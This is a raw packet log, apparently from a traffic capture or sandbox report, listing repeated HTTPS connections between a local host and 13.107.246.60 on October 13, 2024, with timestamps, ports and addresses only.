                                                                                                                          Oct 13, 2024 18:21:56.728410006 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.728421926 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.728427887 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.733079910 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.733093023 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.733257055 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.733643055 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.733654976 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.296380997 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.297049999 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.297068119 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.297547102 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.297552109 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.306559086 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.306886911 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.306915045 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.307266951 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.307272911 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.311006069 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.311492920 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.311523914 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.311841965 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.311847925 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.314102888 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.314387083 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.314405918 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.314730883 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.314737082 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.358165026 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.358532906 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.358547926 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.359002113 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.359006882 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.396821976 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.397030115 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.397084951 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.397116899 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.397131920 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.397142887 CEST49930443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.397147894 CEST4434993013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.399950027 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.399981976 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.400105000 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.400262117 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.400270939 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.408684015 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.408754110 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.408827066 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.409055948 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.409069061 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.409096003 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.409101009 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.412194014 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.412282944 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.412345886 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.412372112 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.412473917 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.412523985 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.412548065 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.412560940 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.412643909 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.412643909 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.412659883 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.412671089 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.414944887 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.415030956 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.415116072 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.415215015 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.415237904 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.418720961 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.418859959 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.418914080 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.418935061 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.418951035 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.418960094 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.418967009 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.421205044 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.421226025 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.421345949 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.421514988 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.421540022 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.462151051 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.462259054 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.462343931 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.462354898 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.462414026 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.462430000 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.462440968 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.462450981 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.462455988 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.464669943 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.464756966 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:57.464849949 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.465013981 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:57.465050936 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.050486088 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.051035881 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.051069975 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.051641941 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.051659107 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.075917006 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.076406002 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.076456070 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.076889992 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.076900005 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.089128017 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.089462996 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.089494944 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.089975119 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.089987993 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.110353947 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.110707998 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.110750914 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.111232996 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.111244917 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.124898911 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.125233889 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.125297070 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.125838995 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.125894070 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.150291920 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.150479078 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.150563955 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.150625944 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.150659084 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.150685072 CEST49931443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.150698900 CEST4434993113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.153513908 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.153546095 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.153731108 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.153808117 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.153812885 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.179440975 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.179632902 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.179845095 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.179846048 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.179846048 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.182106972 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.182156086 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.182259083 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.182385921 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.182400942 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.191318035 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.191340923 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.191386938 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.191412926 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.191541910 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.191581964 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.191615105 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.191616058 CEST49934443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.191637993 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.191657066 CEST4434993413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.193491936 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.193507910 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.193659067 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.193773031 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.193782091 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.217957973 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.217979908 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.218033075 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.218034983 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.218168020 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.218204021 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.218224049 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.218250990 CEST49933443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.218262911 CEST4434993313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.221434116 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.221462965 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.221527100 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.221652031 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.221666098 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.226010084 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.226068974 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.226136923 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.226191998 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.226227045 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.226353884 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.226353884 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.226353884 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.226402998 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.228751898 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.228787899 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.229136944 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.229206085 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.229216099 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.453305006 CEST49935443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.453336954 CEST4434993513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.484559059 CEST49932443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.484570026 CEST4434993213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.813383102 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.814049006 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.814062119 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.814682007 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.814687014 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.847069025 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.847567081 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.847585917 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.848064899 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.848071098 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.863202095 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.863662958 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.863687038 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.864053965 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.864073992 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.906356096 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.906871080 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.906913996 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.907278061 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.907284021 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.912561893 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.912931919 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.912947893 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.913531065 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.913537025 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.921757936 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.921935081 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.922024012 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.922065020 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.922065020 CEST49936443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.922079086 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.922090054 CEST4434993613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.925276041 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.925371885 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.925451040 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.925825119 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.925859928 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.950927973 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.950984001 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.951217890 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.951277018 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.951277018 CEST49938443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.951291084 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.951298952 CEST4434993813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.954015970 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.954037905 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.954374075 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.954374075 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.954427004 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.967811108 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.967879057 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.967978954 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.968059063 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.968080997 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.968080997 CEST49937443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.968090057 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.968094110 CEST4434993713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.970576048 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.970671892 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:58.970906973 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.970982075 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:58.971005917 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.007740021 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.007795095 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.007885933 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.007935047 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.007977962 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.008219957 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.008246899 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.008285046 CEST49940443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.008297920 CEST4434994013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.010921955 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.010986090 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.011451960 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.011451960 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.011528015 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.014508009 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.014552116 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.014662027 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.015012026 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.015059948 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.015059948 CEST49939443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.015073061 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.015079975 CEST4434993913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.017379045 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.017417908 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.017575979 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.017805099 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.017822981 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.610086918 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.611112118 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.611112118 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.611198902 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.611227989 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.640249968 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.640923023 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.640964031 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.640989065 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.641043901 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.641051054 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.641257048 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.641274929 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.641634941 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.641645908 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.677927017 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.678561926 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.678563118 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.678623915 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.678648949 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.710215092 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.711216927 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.711216927 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.711267948 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.711283922 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.714756012 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.714955091 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.715014935 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.715034962 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.715326071 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.715506077 CEST49941443192.168.2.413.107.246.60
